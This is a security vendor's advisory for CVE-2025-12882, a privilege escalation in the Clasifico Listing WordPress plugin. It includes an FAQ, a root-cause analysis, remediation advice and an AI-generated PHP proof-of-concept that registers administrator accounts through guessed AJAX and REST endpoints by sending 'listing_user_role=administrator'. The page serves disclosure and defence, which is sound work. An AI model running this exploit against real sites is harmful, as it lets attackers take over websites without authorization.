What is CVE-2025-12882?

CVE-2025-12882 is a critical unauthenticated privilege escalation vulnerability in the Clasifico Listing plugin for WordPress, affecting versions up to and including 2.0. It allows unauthenticated users to register as administrators by manipulating a registration parameter.

How does the vulnerability work?

The vulnerability allows users registering new accounts to specify their own user role via the ‘listing_user_role’ parameter. Since this parameter is not validated, an attacker can register with elevated privileges, such as the administrator role.

Who is affected by this vulnerability?

Any WordPress site using the Clasifico Listing plugin version 2.0 or earlier is affected. Administrators should check their installed plugins for this version to assess their risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, review the version of the Clasifico Listing plugin installed. If it is version 2.0 or earlier, your site is at risk of this vulnerability.

What is the CVSS score and what does it indicate?

The CVSS score for CVE-2025-12882 is 9.8, indicating a critical severity level. This score reflects the ease of exploitation and the potential impact on confidentiality, integrity, and availability.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the Clasifico Listing plugin to the latest version where the issue is resolved. Additionally, ensure that user roles are assigned securely and that role parameters are validated.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted HTTP request to register as an administrator. It highlights the lack of validation in the registration process.

What are the potential risks of exploitation?

If exploited, an attacker can gain full administrative access to the WordPress site. This includes the ability to create or delete content, install malicious plugins, and potentially compromise the server.

What should I do if my site has been compromised?

If your site has been compromised, immediately revoke unauthorized user accounts, restore from backups, and conduct a security audit. Consider changing all passwords and reviewing access logs for suspicious activity.

How can I ensure my site remains secure in the future?

To maintain security, regularly update all plugins and WordPress core, implement strong password policies, and use security plugins that monitor user activity and enforce best practices.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure that user input is properly validated and sanitized. Implement role-based access control and regularly review code for security best practices.

Where can I find more information about CVE-2025-12882?

More information about CVE-2025-12882 can be found on security databases like NVD or CVE Details, as well as through security advisories from WordPress and the plugin developer.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12882: Clasifico Listing <= 2.0 – Unauthenticated Privilege Escalation (clasifico-listing)

CVE ID CVE-2025-12882

Plugin clasifico-listing

Severity Critical (CVSS 9.8)

CWE 269

Vulnerable Version 2.0

Patched Version —

Disclosed February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12882 (metadata-based):
The Clasifico Listing plugin for WordPress, version 2.0 and earlier, contains an unauthenticated privilege escalation vulnerability. This vulnerability allows any unauthenticated user to register an account with administrator privileges by manipulating a registration parameter. The CVSS 3.1 score of 9.8 (Critical) reflects the attack’s network-based nature, low complexity, and complete compromise of confidentiality, integrity, and availability.

Atomic Edge research indicates the root cause is improper privilege management (CWE-269) within the user registration function. The plugin likely processes registration requests via a WordPress hook (such as wp_ajax_nopriv or a custom registration endpoint) and directly accepts a user-supplied ‘listing_user_role’ parameter without validation. This parameter is then passed to WordPress user creation functions like wp_insert_user() or wp_create_user(), allowing the attacker to set arbitrary roles. These conclusions are inferred from the CWE classification and vulnerability description, as no source code diff is available for confirmation.

Exploitation requires sending a crafted HTTP request to the plugin’s registration endpoint. The exact endpoint is not specified in the metadata, but WordPress plugin patterns suggest two likely vectors. The first is a custom AJAX handler at /wp-admin/admin-ajax.php with an action parameter like ‘clasifico_listing_register’. The second is a custom REST API endpoint at /wp-json/clasifico/v1/register. The attacker would send a POST request containing standard registration fields (username, email, password) plus the malicious parameter ‘listing_user_role’ set to ‘administrator’. No authentication or nonce is required.

Effective remediation requires removing client control over the role assignment. The plugin must assign a default, low-privilege role (like ‘subscriber’) during registration. The fix should also implement server-side validation to reject any registration request containing a role parameter. WordPress core functions like add_user_meta() or update_user_meta() should only be called with hard-coded, safe role values. A capability check (current_user_can(‘create_users’)) would also prevent unauthorized role assignment but would not fully address unauthenticated registration flaws.

Successful exploitation grants an unauthenticated attacker full administrative access to the WordPress site. This enables complete site takeover, including the creation and deletion of any content, installation of malicious plugins or themes, defacement, data exfiltration, and server-side code execution via plugin/theme editors or arbitrary file uploads. The attacker can also lock out legitimate administrators, establish persistent backdoors, and use the compromised site for further attacks.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-12882 - Clasifico Listing <= 2.0 - Unauthenticated Privilege Escalation
<?php
/**
 * Proof of Concept for CVE-2025-12882.
 * This script attempts to exploit the privilege escalation vulnerability by registering a new user with the 'administrator' role.
 * The exact endpoint is inferred from common WordPress plugin patterns, as the vulnerable code is not publicly available.
 */

$target_url = 'https://example.com'; // CHANGE THIS to the target WordPress site URL

// Attempt two common WordPress plugin registration patterns.
// Pattern 1: AJAX endpoint (most common for front-end user actions)
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ajax_data = [
    'action' => 'clasifico_listing_register', // Inferred action name based on plugin slug
    'username' => 'atomic_edge_admin_' . rand(1000,9999),
    'email' => 'atomic_edge_' . rand(1000,9999) . '@example.com',
    'password' => 'AtomicEdgeP0C!',
    'listing_user_role' => 'administrator' // The malicious parameter
];

// Pattern 2: REST API endpoint (common in newer plugins)
$rest_url = $target_url . '/wp-json/clasifico/v1/register';
$rest_data = [
    'username' => 'atomic_edge_admin_' . rand(1000,9999),
    'email' => 'atomic_edge_' . rand(1000,9999) . '@example.com',
    'password' => 'AtomicEdgeP0C!',
    'listing_user_role' => 'administrator'
];

function send_request($url, $data) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return ['code' => $http_code, 'body' => $response];
}

echo "[*] Attempting exploitation via AJAX endpoint...n";
$result1 = send_request($ajax_url, $ajax_data);
echo "    HTTP Code: " . $result1['code'] . "n";
echo "    Response: " . substr($result1['body'], 0, 200) . "nn";

if ($result1['code'] == 200 && (strpos($result1['body'], 'success') !== false || strpos($result1['body'], 'user_id') !== false)) {
    echo "[+] AJAX endpoint may be vulnerable. Check for user creation: " . $ajax_data['username'] . "n";
} else {
    echo "[-] AJAX endpoint may not be vulnerable or uses a different action name.n";
}

echo "[*] Attempting exploitation via REST API endpoint...n";
$result2 = send_request($rest_url, $rest_data);
echo "    HTTP Code: " . $result2['code'] . "n";
echo "    Response: " . substr($result2['body'], 0, 200) . "nn";

if ($result2['code'] == 200 || $result2['code'] == 201) {
    echo "[+] REST endpoint may be vulnerable. Check for user creation: " . $rest_data['username'] . "n";
} else {
    echo "[-] REST endpoint may not be vulnerable or uses a different path.n";
}

echo "n[*] Note: This PoC is based on inferred endpoints. Actual exploitation may require adjusting the action name or endpoint path.n";
?>

Frequently Asked Questions

What is CVE-2025-12882?
Understanding the vulnerability
CVE-2025-12882 is a critical unauthenticated privilege escalation vulnerability in the Clasifico Listing plugin for WordPress, affecting versions up to and including 2.0. It allows unauthenticated users to register as administrators by manipulating a registration parameter.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows users registering new accounts to specify their own user role via the ‘listing_user_role’ parameter. Since this parameter is not validated, an attacker can register with elevated privileges, such as the administrator role.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Clasifico Listing plugin version 2.0 or earlier is affected. Administrators should check their installed plugins for this version to assess their risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, review the version of the Clasifico Listing plugin installed. If it is version 2.0 or earlier, your site is at risk of this vulnerability.
What is the CVSS score and what does it indicate?
Understanding severity levels
The CVSS score for CVE-2025-12882 is 9.8, indicating a critical severity level. This score reflects the ease of exploitation and the potential impact on confidentiality, integrity, and availability.
How can I mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Clasifico Listing plugin to the latest version where the issue is resolved. Additionally, ensure that user roles are assigned securely and that role parameters are validated.
What does the proof of concept demonstrate?
Practical implications of the vulnerability
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted HTTP request to register as an administrator. It highlights the lack of validation in the registration process.
What are the potential risks of exploitation?
Consequences of a successful attack
If exploited, an attacker can gain full administrative access to the WordPress site. This includes the ability to create or delete content, install malicious plugins, and potentially compromise the server.
What should I do if my site has been compromised?
Response to exploitation
If your site has been compromised, immediately revoke unauthorized user accounts, restore from backups, and conduct a security audit. Consider changing all passwords and reviewing access logs for suspicious activity.
How can I ensure my site remains secure in the future?
Best practices for WordPress security
To maintain security, regularly update all plugins and WordPress core, implement strong password policies, and use security plugins that monitor user activity and enforce best practices.
Is there a way to prevent similar vulnerabilities in the future?
Long-term security strategies
To prevent similar vulnerabilities, ensure that user input is properly validated and sanitized. Implement role-based access control and regularly review code for security best practices.
Where can I find more information about CVE-2025-12882?
Resources for further reading
More information about CVE-2025-12882 can be found on security databases like NVD or CVE Details, as well as through security advisories from WordPress and the plugin developer.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations